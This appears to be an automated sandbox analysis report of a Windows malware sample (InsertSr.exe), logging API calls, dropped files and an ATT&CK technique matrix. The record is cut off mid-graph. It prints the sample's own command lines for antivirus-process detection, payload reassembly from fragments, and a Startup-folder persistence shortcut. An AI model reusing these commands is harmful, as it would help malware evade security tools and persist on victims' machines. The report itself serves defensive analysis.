      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: InsertSr.exeStatic file information: File size 45088780 > 1048576
      Source: InsertSr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C8B75 push ecx; ret 19_2_004C8B88
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004BCBF1 push eax; retf 19_2_004BCBF8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A8B75 push ecx; ret 22_2_001A8B88

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifFile created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifFile created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.urlJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.urlJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_005259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_005259B3
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_004B5EDA
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_002059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_002059B3
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00195EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_00195EDA
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004C33B7
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00504005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00504005
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050C2FF
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0050494A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050CD14 FindFirstFileW,FindClose,19_2_0050CD14
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0050CD9F
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F5D8
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F735
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050FA36
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00503CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00503CE2
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E4005
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EC2FF
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose,22_2_001E494A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ECD14 FindFirstFileW,FindClose,22_2_001ECD14
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_001ECD9F
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF5D8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF735
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EFA36
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E3CE2
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004B5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_004B5D13
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\316094\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\316094Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: Virtuoso.scr, 00000016.00000002.3381885400.0000000001427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
      Source: Intranet.pif, 00000013.00000002.3381802910.0000000001717000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_005145D5 BlockInput,19_2_005145D5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C8E89 _memset,IsDebuggerPresent,19_2_004C8E89
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_004D5CAC
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_004F88CD
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CA354 SetUnhandledExceptionFilter,19_2_004CA354
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_004CA385
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001AA354 SetUnhandledExceptionFilter,22_2_001AA354
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_001AA385

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifMemory written: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif base: C00000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrMemory written: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr base: A00000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F9369 LogonUserW,19_2_004F9369
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004B5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_004B5240
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00501AC6 SendInput,keybd_event,19_2_00501AC6
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_005051E2 mouse_event,19_2_005051E2
      Source: C:\Users\user\Desktop\InsertSr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 316094Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SequenceOctoberContributionRef" Recreation Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif Intranet.pif uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif C:\Users\user\AppData\Local\Temp\316094\Intranet.pifJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"Jump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & echo url="c:\users\user\appdata\local\immersive creations co\virtuoso.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & exit
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & echo url="c:\users\user\appdata\local\immersive creations co\virtuoso.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_004F88CD
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00504F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00504F1C
      Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002909000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170185448.0000000003B4B000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154175275.0000000000556000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: Intranet.pif, Virtuoso.scrBinary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C885B cpuid 19_2_004C885B
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004E0030 GetLocalTime,__swprintf,19_2_004E0030
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004E0722 GetUserNameW,19_2_004E0722
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_004D416A
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: Process Memory Space: Intranet.pif PID: 1292, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: Virtuoso.scr PID: 2404, type: MEMORYSTR
      Source: Virtuoso.scrBinary or memory string: WIN_81
      Source: Virtuoso.scrBinary or memory string: WIN_XP
      Source: Virtuoso.scrBinary or memory string: WIN_XPe
      Source: Virtuoso.scrBinary or memory string: WIN_VISTA
      Source: Virtuoso.scrBinary or memory string: WIN_7
      Source: Virtuoso.scrBinary or memory string: WIN_8
      Source: Virtuoso.scr.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: Process Memory Space: Intranet.pif PID: 1292, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: Virtuoso.scr PID: 2404, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information11
      Scripting
      2
      Valid Accounts
      1
      Windows Management Instrumentation
      11
      Scripting
      1
      Exploitation for Privilege Escalation
      1
      Disable or Modify Tools
      21
      Input Capture
      2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop Protocol21
      Input Capture
      1
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Command and Scripting Interpreter
      2
      Valid Accounts
      2
      Valid Accounts
      2
      Obfuscated Files or Information
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin Shares3
      Clipboard Data
      1
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron2
      Registry Run Keys / Startup Folder
      21
      Access Token Manipulation
      1
      DLL Side-Loading
      NTDS27
      System Information Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
      Process Injection
      111
      Masquerading
      LSA Secrets31
      Security Software Discovery
      SSHKeylogging2
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
      Registry Run Keys / Startup Folder
      2
      Valid Accounts
      Cached Domain Credentials4
      Process Discovery
      VNCGUI Input Capture1
      Proxy
      Data Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
      Access Token Manipulation
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
      Process Injection
      Proc Filesystem1
      System Owner/User Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565338 Sample: InsertSr.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 51 qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi 2->51 65 Suricata IDS alerts for network traffic 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected GO Backdoor 2->69 71 3 other signatures 2->71 10 InsertSr.exe 26 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 3 10->15         started        81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->81 19 Virtuoso.scr 12->19         started        process6 file7 49 C:\Users\user\AppData\Local\...\Intranet.pif, PE32 15->49 dropped 61 Drops PE files with a suspicious file extension 15->61 21 Intranet.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        32 7 other processes 15->32 63 Injects a PE file into a foreign processes 19->63 29 Virtuoso.scr 19->29         started        signatures8 process9 dnsIp10 43 C:\Users\user\AppData\Local\...\Virtuoso.scr, PE32 21->43 dropped 45 C:\Users\user\AppData\Local\...\Virtuoso.js, ASCII 21->45 dropped 75 Drops PE files with a suspicious file 